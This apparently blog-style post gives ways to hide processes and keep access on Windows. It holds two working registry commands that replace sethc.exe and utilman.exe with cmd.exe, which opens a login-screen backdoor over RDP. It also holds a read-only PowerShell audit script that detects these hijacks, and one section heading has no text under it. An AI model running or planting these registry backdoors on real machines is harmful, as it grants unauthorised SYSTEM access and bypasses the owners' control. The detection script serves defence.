Windows Mischief

Ways to hide processes on Windows


Here are some of my ideas for hiding processes on a Windows system.

Registry Hijacks

Subvert sticky keys

Press F5 a bunch of times at an RDP login screen:

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

Subvert utility manager

Press Win+U at an RDP login screen:

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
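
To check a host for the two hijacks above, the following audit lists every Debugger value under Image File Execution Options and flags the ones attached to binaries that can be launched from the login screen. It is an added example, not code from the original post. The function name, the WOW6432Node path and the binaries in the list other than sethc.exe and utilman.exe are assumptions.

```powershell
# Added example: audit Image File Execution Options (IFEO) for Debugger values.
# Assumption: the 32-bit registry view (WOW6432Node) is checked as well.
$ifeoRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
)

# sethc.exe and utilman.exe are the two named on the page; the others are
# accessibility tools assumed to be reachable from the same login screen.
$loginScreenBinaries = @('sethc.exe', 'utilman.exe', 'osk.exe',
                         'magnify.exe', 'narrator.exe', 'displayswitch.exe')

function Get-IfeoDebugger {
    param([string[]]$Roots = $ifeoRoots)
    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        foreach ($key in Get-ChildItem -LiteralPath $root -ErrorAction SilentlyContinue) {
            # GetValue returns $null when the subkey has no Debugger value.
            $debugger = $key.GetValue('Debugger', $null)
            if ($null -eq $debugger) { continue }
            [pscustomobject]@{
                Image       = $key.PSChildName
                Debugger    = $debugger
                # -contains is case-insensitive, so SETHC.EXE also matches.
                LoginScreen = $loginScreenBinaries -contains $key.PSChildName
                KeyPath     = $key.Name
            }
        }
    }
}

$findings = @(Get-IfeoDebugger)
$findings | Sort-Object -Property LoginScreen -Descending |
    Format-Table -AutoSize -Wrap

# A Debugger on a login-screen binary has no routine administrative use.
# Other entries can be legitimate (for example a Task Manager replacement),
# so review them rather than deleting blindly.
$critical = @($findings | Where-Object { $_.LoginScreen })
if ($critical.Count -gt 0) {
    Write-Warning "$($critical.Count) login-screen binary hijack(s) found."
    exit 1
}
```

The script only reads the registry; a non-zero exit code makes it usable from a scheduled task or a configuration-management check.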

Add a network share to system PATH

Unsorted